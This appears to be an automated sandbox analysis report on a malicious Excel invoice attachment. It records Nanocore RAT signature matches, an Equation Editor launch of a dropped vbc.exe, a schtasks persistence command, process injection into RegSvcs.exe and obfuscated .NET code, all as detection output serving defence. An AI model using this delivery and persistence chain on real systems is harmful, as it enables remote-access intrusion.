Source: 00000007.00000002.2393755361.00000000005C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000007.00000002.2393755361.00000000005C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000007.00000002.2395217863.00000000037E6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000002.2393666781.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000007.00000002.2393666781.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: vbc.exe PID: 2480, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: vbc.exe PID: 2480, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: RegSvcs.exe PID: 2696, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: RegSvcs.exe PID: 2696, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.2.RegSvcs.exe.380d42c.9.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.380d42c.9.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.vbc.exe.3890588.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.vbc.exe.3890588.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.vbc.exe.3890588.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.2.RegSvcs.exe.27d1644.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.27d1644.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.RegSvcs.exe.840000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.840000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.vbc.exe.3890588.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.vbc.exe.3890588.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.vbc.exe.3890588.5.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.2.RegSvcs.exe.38085f6.8.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.38085f6.8.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.RegSvcs.exe.38085f6.8.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.2.RegSvcs.exe.844629.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.844629.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.RegSvcs.exe.5c0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.5c0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.2.RegSvcs.exe.3811a55.10.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.3811a55.10.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.RegSvcs.exe.840000.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.840000.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.RegSvcs.exe.380d42c.9.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.380d42c.9.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.vbc.exe.37494e8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.vbc.exe.37494e8.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore

Source: nano[1].exe.2.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: vbc.exe.2.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: gmSlQSien.exe.4.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: 7.2.RegSvcs.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 7.2.RegSvcs.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.RegSvcs.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@9/29@15/2

Source: C:\Users\Public\vbc.exe	Code function: 4_2_006D053E AdjustTokenPrivileges,	4_2_006D053E
Source: C:\Users\Public\vbc.exe	Code function: 4_2_006D0507 AdjustTokenPrivileges,	4_2_006D0507
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 7_2_004F10DA AdjustTokenPrivileges,	7_2_004F10DA
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 7_2_004F10A3 AdjustTokenPrivileges,	7_2_004F10A3

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe

File created: C:\Program Files (x86)\SMTP Service

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsx

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{f57d5a77-8670-45ef-b736-5f3a07b68725}
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Users\Public\vbc.exe	Mutant created: \Sessions\1\BaseNamedObjects\NFKnYlgkNzhyGKSdXXNN

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRE04.tmp

Jump to behavior

Source: C:\Windows\SysWOW64\schtasks.exe

Console Write: ..................#.............h.#.....(.P.....h...............(...............................................................................

Jump to behavior

Source: C:\Users\Public\vbc.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmp	Binary or memory string: Select * from UnmanagedMemoryStreamWrapper WHERE modelo=@modelo;?
Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmp	Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmp	Binary or memory string: Select * from Aluguel5Erro ao listar Banco sql-UnmanagedMemoryStreamWrapper.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO UnmanagedMemoryStreamWrapper VALUES(@modelo, @fabricante, @ano, @cor);
Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmp	Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);

Source: SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsx	Virustotal: Detection: 29%
Source: SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsx	ReversingLabs: Detection: 22%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\gmSlQSien' /XML 'C:\Users\user\AppData\Local\Temp\tmp2720.tmp'
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
Source: unknown	Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\gmSlQSien' /XML 'C:\Users\user\AppData\Local\Temp\tmp2720.tmp'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Jump to behavior

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\Public\vbc.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsx

Static file information: File size 2355200 > 1048576

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: System.pdbWindows\exe\RegSvcs.pdb source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
Source:	Binary string: ystem.pdb- source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
Source:	Binary string: =T3UpC:\Windows\System.pdbA!`y source: RegSvcs.exe, 00000007.00000002.2395879525.0000000004FDC000.00000004.00000001.sdmp
Source:	Binary string: C:\Windows\RegSvcs.pdbN source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
Source:	Binary string: ps.pdb source: RegSvcs.exe, 00000007.00000002.2394056812.00000000008BD000.00000004.00000001.sdmp
Source:	Binary string: C:\Windows\dll\System.pdb source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
Source:	Binary string: System.EnterpriseServices.Wrapper.pdb source: smtpsvc.exe, 00000008.00000002.2225121272.0000000001D90000.00000002.00000001.sdmp
Source:	Binary string: C:\Windows\System.pdb``[ source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
Source:	Binary string: RegSvcs.pdb source: RegSvcs.exe, 00000007.00000003.2194043943.00000000006E3000.00000004.00000001.sdmp, smtpsvc.exe, smtpsvc.exe.7.dr
Source:	Binary string: indows\System.pdbpdbtem.pdb source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.pdb source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
Source:	Binary string: System.pdb source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
Source:	Binary string: System.pdb8 source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
Source:	Binary string: mscorrc.pdb source: vbc.exe, 00000004.00000002.2194187602.0000000000B10000.00000002.00000001.sdmp, RegSvcs.exe, 00000007.00000002.2394185585.0000000002130000.00000002.00000001.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp

Source: SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsx

Initial sample: OLE indicators vbamacros = False

Source: SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsx

Initial sample: OLE indicators encrypted = True

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: 7.2.RegSvcs.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.2.RegSvcs.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\Public\vbc.exe	Code function: 4_2_011D6A9F push es; iretd	4_2_011D6B77
Source: C:\Users\Public\vbc.exe	Code function: 4_2_011DA2BC push es; retf	4_2_011DA2FC
Source: C:\Users\Public\vbc.exe	Code function: 4_2_011DA0AC push es; retf	4_2_011DA272
Source: C:\Users\Public\vbc.exe	Code function: 4_2_011DA2FE push es; retf	4_2_011DA30E
Source: C:\Users\Public\vbc.exe	Code function: 4_2_011DA274 push es; retf	4_2_011DA28A
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00146D35 push esp; retf	4_2_00146D36
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00147FF9 push esp; retf	4_2_00147FFA
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002EC4B5 push CCFFFFFEh; ret	4_2_002EC4BA
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002EC55D push edi; retf	4_2_002EC563
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002ECE17 push esp; retf	4_2_002ECE19
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 7_2_001A5E25 push esp; retf	7_2_001A5E26
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 7_2_001A9D62 push eax; retf	7_2_001A9D65
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 7_2_001A9D66 pushad ; retf	7_2_001A9D69
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 7_2_001A989B push ecx; retf 001Ah	7_2_001A98A1

Source: initial sample	Static PE information: section name: .text entropy: 7.9540154939
Source: initial sample	Static PE information: section name: .text entropy: 7.9540154939
Source: initial sample	Static PE information: section name: .text entropy: 7.9540154939

Source: 7.2.RegSvcs.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
